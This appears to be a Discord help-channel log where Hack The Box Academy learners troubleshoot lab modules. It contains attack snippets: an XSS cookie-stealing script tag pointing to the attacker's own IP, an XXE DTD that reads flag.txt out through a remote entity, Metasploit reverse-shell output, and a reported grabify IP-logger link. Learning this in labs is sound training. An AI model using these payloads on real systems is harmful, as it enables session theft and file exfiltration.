Then search for exploits related to it (note the exploit may already be in msfconsole, just use it)

ok thanks got it

will do. in that case this will go quickly.

ok great I will do host2 today for sure

As a note if you already know an exploit name, you can generally just use <exploit name>

Instead of searching around for it

Which VPN server is the closest one to SoCal? Anyone have any ideas? Just want to make sure to minimize latency.

Latency doesn't matter (all too much)

It's stability that matters

I've had stable connections ranging from (US|EU)-{1..6}

What kills it is jitter (the random latency spikes)

I found a field that was xss vulnerable in the session hijack section but i dont knw ho what to do from there i cant seem to understand what this module is trying to teach me

what module and section?

Cross site scrupting module session hijacking section

Well once you find the field, you inject your xss script in there, as described by the section

<script src="http://your_ip:port/script.js"></script> [the script.js is the Javascript code they provide in the reading, and should be in the same dir as you start the web server in)

I didnt understand like they provide 2 payloads i chose one and inserted it seting up a listnenrr

They give you a script.js, which throws stuff to your index.php

That is where im comfused the script.js and index.php i created a file index.php in the folder i started the listner

The Javascript code they give [new image()] is the script.js

That is a separate file that goes in the directory you start the listener in

Oh that also have to be put in that directory along with index.php

Yes

You can't call a file that doesn't exist :)

When you start the webserver/listener that's the webroot

So any calls will look in that "webroot" for looking for files

Otherwise in your listener you'll get 404 not found

Ohk thanks ill try it noe and see how it goes this module is a bit tough i cant seem to wrap my mind ariund this

This info btw is basic web knowledge

Which the module won't go over, since it's assumed you know it

Web Attacks

Advanced File Discloser

Advanced Exfiltration with CDATA

Hello. I understand that it's not necessary, but can someone explain why the CDATA method does not work on the exercise? Maybe there is something wrong with my .dtd or my injections?:
<!ENTITY joined "%begin;%file;%end;">

  <!ENTITY % begin "<![CDATA["> 
  <!ENTITY % file SYSTEM "file:///flag.txt"> 
  <!ENTITY % end "]]>"> 
  <!ENTITY % xxe SYSTEM "http://$IP:4444/cdata.dtd">
  %xxe;
]>```
`<email>&joined;</email>`
Thanks

Anyone know why it doesn't show the banner even though -sC is toggled?

Do the credentials provided during labs apply for future labs as well or should I disregard them? For example, during the Easy Footrpinting lab I receive creds - do I have to keep these in mind for the Medium/Hard labs? Obviously in a real-life scenario I'd keep them in mind but what about HTB labs?

Try specifying --script banner

No

no luck 😦

Consider labs as independent unless specified

Did you also do -sV?

It also helps to specify what module and section you're on

Does this also mean that credentials that are found during a lab but not directly provided are not to be used in other labs?

doesn't change the output on the network enumeration module medium lab

Correct, only in some cases they'll be reused. So it's still good to save them, just in case, but for the skill exams -- they can be considered unlinked

Ah, do it in pwnbox

Or connect via nc

nc -vn <ip> 53

Looking for somebody who could provide some help for the Whitebox Attacks Client-Side Prototype pollution challenge. I have local XSS and know that I need to get the admin to promote through /admin.php?promote=2 but I cant get the click. DM would be great

thanks, just trying to figure out why i'm getting different output from the walkthrough

Because sometimes it's dumb

Sometimes you'd need to reset the target a bunch to get it

The pwnbox gives the expected answer for it most of the time

No idea why

hmm ty!

But using nc to connect will give you the banner after a few moments

pwnbox does indeed work. Maybe it's a vpn thing =/

Nope

As the pwnbox uses the vpn as well

Thanks I appreciate your help!

The password attacks bites you in the ass if you don't save credentials throughout (except for the skill exam)

By skill exam you mean the labs at the end of each module, correct? What password attacks are you referring to?
Also - are passwords found during the CPTS should similary be considered unlinked?

yeah

the exam is a different beast

the exam is a fully networked environment

No. She's talking about the #cpts exam.

well no in that instance i was referring to the skill exam for the Password Attacks module

usually if i'm referring to the cert exam, i;ll say cert unless my brain decides not to work

@vocal galleon wrong bot

but also #bot-commands

regular plebs can't use the giveaway bots

what exactly are you trying to do?

ok sorry

"I'm on the last question of the Shell & Payloads section. I successfully gained shell access to machine 3, host 172.16.1.13. However, the directory that contains the flag doesn't appear: C:\Users\Administrator\Desktop\Skills-flag.txt. I can access the Administrator user directory, but the Desktop directory doesn't show up. Any advice?"

yeah you don't use any /help or !help for that

the general format for asking for help here is providing module and section name with what you've tried

I take it you've already used the e*b* exploit to get the shell

otherwise that's step one; getting the shell

ok thanks, ask the question this way next time

as this is a community based help chat, so no bots required for that

also as a note; always be mindful of spoilers

but the flag should be there

if you dir C:\users\administrator\ desktop should be there

I gained shell access by uploading the Antak webshell and executing it. After that, I used a PowerShell Base64 encoded reverse shell command to obtain an interactive shell on the machine provided for the exercises."

well host 3 for the skill assessment is vulnerable to something specific

Can I send you a screenshot? The directory is not there."

see the hostname of it

no; don't need to send a screenshot

you shouldn't need to upload any sort of webshell

just using the specific exploit

msfconsole makes this easier

I understand, but I have access to the machine, I can see its network, and I can see its name. It's strange that the Desktop directory doesn't appear. I'll try accessing it through msfconsole.

yeah idk why you went through a webshell or anything

the exploit is explicitly gone over by the module

how do I disguise an .elf file as an image file again if when I go to upload file as image the file doesn't show up in file explorer? This is for question 3 of assessment of shells and payloads

I made the payload as an .elf file

is there a way to reset a module so I can do it over again?

no you have to make new account for that they want you to move forward. on TryHackMe you can do that but on HTB Academy you'll reuse old info because its cumulative so you'll get your review in anyways.

the HTB Academy system actually works better for learning long term

but no you cannot reset a module

I tried copying elf file into an .elf.jpeg file but it was not a compatible image file

could I change it with burp suite

Indeed, because it doesn't teach you for a memory exam-- it teaches you for real scenarios

I don't know why you need a .elf file?

As elf is generally a binary format

A web page won't run a binary file

ok what kind of payload do I need to generate? ASP?

What module?

use burp and run through a list of extensions

If it's file upload, php is generally a safe bet

what's this elf file for

^

he said skill assessmnet question 3 for shells and payloads module

i don't remember that module but i want to know the train of thought

seems a bit odd to upload an elf file

Well that's way out of line for that one

Considering the hostname of that machine

Especially considering the host ||isn't even linux||

nmap showed it was linux. is it macos?

Host 3 isn't any nix based OS

At least afaik

its host 2 not host 3

Ah host 2

question 3

There's an exploit for the type of blog site

ok got it thatnks

Once you find it using msfconsole search. You can just use it

I got the exploit but it won't create a session

msf6 exploit(unix/webapp/spip_connect_exec) > run

[*] Started reverse TCP handler on 10.129.75.67:4444 
[*] 172.16.1.12:80 - Attempting to exploit...
[*] Exploit completed, but no session was created.

This is my issue.

I know the exploit works and that I'm using the right port. Wait hold on.

that's about as close as I get

I managed to log into website and can upload image files

but I don't know what else to do

your issue is using the wrong interface

also that's not the right exploit

you can probably searchsploit for it

but that might work idk

btw the question does lead you on to what to do

right got it right I answered question

so really just gotten work on question 5 because completed questions 3 and 4 already

so question 5 is what I was actually working on I guess

:)

Alright, I'm on the Windows File Transfer Methods (24/Section/160) lab now. This time, despite doing seemingly everything right (spoilers redacted in screenshot), the submission form is saying that the result of hasher upload_win.txt is incorrect. What am I missing?

I tried using burp suite to upload php payload and got 200 success message in burp suite but I don't have a shell

what am I doing wrong here?

uploading a file doesn't just trigger a shell

Don't need a shell for 24/160.

i was answering queuemark

so you downloaded the zip from next to the question, uploaded it, then unzipped and ran hasher against it?

Yes. You can see the uploaded zip file on the remote host's desktop in the screenshot.

i can see that; but did you unzip it? :)

i'd delete the file that's already on the desktop

and unzip again

Yes. Right-clicked, then "Extract All."

After deleting the file that was there originally, that is.

so how am I supposed to get the shell? I upload file but then do I need to access the file to get shell no?

also; make sure you don't have any extra spaces

use the exploit mentioned by the question, make sure your LHOST is for the right subnet

172.16 can't reach 10.129

ok

Ah, yes, there was a hidden non-printable character in there — hitting the backspace key once after copying and pasting the hash worked. Thanks again.

Does anyone have any tips for getting IP spoofing with nmap -S working? I'm working through the nmap IDS/IPS evasion labs and get a "failed to determine route" error from nmap, even though there is no such problem without the -S. I am using -e tun0 and -Pn, I've tried with pwnbox and via openvpn on kali and ubuntu

sigh

you don't need to use -S

-S requires that the spoofed IP be live

and is generally only used for counter-Intel as you're spoofing the IP, the responses won't be sent back to you

but the spoofed IP

I take it this has been asked before... Apologies If I just didn't find it. I didn't think I needed to use it, was just trying to figure out why it gives that error. Thanks

I switched LHOST to new IP and it still won't work:

msf6 exploit(unix/webapp/spip_connect_exec) > run

[*] Started reverse TCP handler on 172.16.1.5:4444 
[*] 172.16.1.12:80 - Attempting to exploit...
[*] Exploit completed, but no session was created.```

Could also trigger SYN flooding alarms if the spoofed IP is not live.

it's in the documentation as well

it's why -S isn't really useful for doing your own recon, if you're trying to determine open ports

for some reason the exploit runs successfully but I still can't get the shel

I'm gonna take a break for a few hours before trying this again

Hi! someone could give a hand with this please? I'm at the module Attacking Common Services - Attacking SQL Databases

Get-BootKey : Requested registry access is not allowed.
At line:1 char:8
+ $key = Get-BootKey -SystemHivePath .\SYSTEM
+        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OpenError: (:) [Get-BootKey], SecurityException
    + FullyQualifiedErrorId : GetBootKey_OtherError,DSInternals.PowerShell.Commands.GetBootKeyCommand````

any idea why this command wont work, i imported the module and have perms

I've already tried a lot by 2 hours but I got the same answer, what should I do? 😭

I'v already install and reinstall impacket, reset the target, trying with sqsh and nothing

Was a while ago that I did this but if you are attacking mssql dont you need to authenticate with '.\hostname'? I could be and probably am wrong.

use the -debug option

to see your error

How did they get the username/password in the vaccine module?

who writes the hackthebox modules

I've been stuck on windows fundamentals intro to command skills assessment last question since yesterday. the question says "What user account on the Domain Controller has many Event ID(4625) logon failures generated in rapid succession. flag is name of the user account. i can get a listing of the error id 4625 and pretty sure i see the repeated logons during a block of timeframes, but i can't seem to figure out how to filter the information so it shows the account name

i agree. not a lot of people teach you HOW to learn. this module is so helpful in suggesting many ways to make the most of the learning experience through multiple methods of contemplating and internalizing information

Ready but I dont think it could be useful 🤔

Same 😦

htbdbuser

you're missing the db in the middle there

source: i did that once or twice

You are right!!!...
But same bro

sudo pip3 install impacket --upgrade --break-system-packages

Thanks! This is what I got

I think the problem is the impacket itself, the latest version, I dont know 😦

it's running under a venv so maybe sudo pipx install impacket --upgrade iirc

or maybe it's just sudo pipx upgrade impacket

been a minute since I use my own vm

Did you connect to the mssql server using mssqlclient.py? because... 😅

i believe it's a mssql server; don't think it's mysql

this is the footprinting on common services module?

Yeah its's a mssql server on Attacking common services module, Attacking SQL Databases
section

👍 give me a min to spin up my vm and see

Sure, thanks man!

ik it's an issue with impacket install on pwnbox

hey guys, im doing Command Injections: Skills Assessment and im quite lost, is there a place where i can download the TinyWebManager v2.4.6? I can only find v2.4.3 and v2.4.7

i brought it up in #710108839063846964 a while back

you don't need any extra tools

i don't even recall needing TinyWebManager

its the CMS

i need to read the source code to find a Command Injection vuln

ok? don't see why you need to download it...

you don't though

i didn't need it to pass that module

how much time did it take to you?

or at least the source code of the app itself

don't recall ¯_(ツ)_/¯

Oh

?

sorry i'm splitting 2 convos here if it's confusing you

I tried with both but I just realise that I used htbuser instead of htbdbuser on my vm

how did you know what to attack and how to attack it then? its messing my head, i tried reading source code of v2.4.3 but i got nowhere

fucking around and looking around

¯_(ツ)_/¯

click around

you'll find something somewhere

aight, but to do some character escaping and filter bypass, all what i need is in the cheatsheet at least?

i mean, if you remember

If you really want to learn you must search for yourself, try several ways until you find the solution

Then use it without windows auth

yeah it works fine on my machine with htbdbuser

try this

pipx uninstall impacket; pipx install impacket

on pwnbox

but also if you're using your own vm; don't be running the pwnbox

https://academy.hackthebox.com/achievement/1352920/109

crap how the heck do i share the achievement

anyways, thx @fathom pendant and @plucky hollow

gz

see 😉 no need to overthink the whole thing

found the answer but i just used Get-ADUsers and used * as the filter and tried every username. i am certain this is the incorrect method as i was assuming i was supposed to use Get-WinEvent as the hint suggested and found that -FilterHashTable @{logname='security'; id='4625'} gave a listing but it didn't show the user names. so, then i tried piping it to "fl" to format list and it showed a lot of data but it wouldn't scroll to the top of the list where the times of repeated logins were. i would really like to learn how i could've filtered the data better and to ensure it was domain controller event log that i was filtering through.

You can do a little googling to find the command; it's also in the cheatsheet

Basically pipe it to Select-Object -ExpandProperty message

Hi!

how can i erase my actual credit card from the billing?

Message support

<@&861185840277487616> this is a grabify link masked

ive been caught

lol

Fuck off

woah chill out dude

I was only trying to 'hack the box'

We don't tolerate grabify links dude

Read the #rules

soz didnt see that

And this server isn't about hacking other users

ill take the timeout if mods deem it appropirate

You should just get banned

Imo

any recommendations?

oh.

Nope as any server that's about hacking people breaks discord ToS

I suggest reading #rules and #welcome of servers you join

i do that i just didnt see

even if you wanted to?

I mean if you want your discord account banned and likely ip/mac banned

¯_(ツ)_/¯

Those servers don't last long

a ok

And if reported to authorities, discord has to abide by subpeoanas

by bye

<@&861185840277487616> BAN ME PLEASE!

pluh

mods?

@surreal rain

woah dude thats too far, i just like hacking and sh!ttt thats all

jeez

We like hacking too, but we do it legally

You can't hack shit bro

i also do it legally i dont leak anything tho

ye i can

Take your skid shit elsewhere

Grabify isn't a legal thing lmfao

i brute forced my school the other day? if that helps @rustic sage ?

Lol

And no one knows what your plans are with the ips you grab

then why does it exist for the public?

Fuckin dumbass

true true

That's not hacking, plus no one would admit that 😭

WOAH

oh well

Call it as I sees it bud

fair enough

Just because it's available doesn't make it legal

whens that ban coming btw like jeez

also true

no vpn, just plain old desktop discord

Brute forcing creds is some skid shit tbh

debatable but i see why u think that

Mods asleep damn

its 2 am for me

I mean it is skid shit

@urban sage

who dat?

Might be afk for a min

i see now nvm

Either way we're flooding th chat with useless chatter

yeah

Though your existence overall is useless

theres no general chat tho

real.

There is

A general chat

cant type in it tho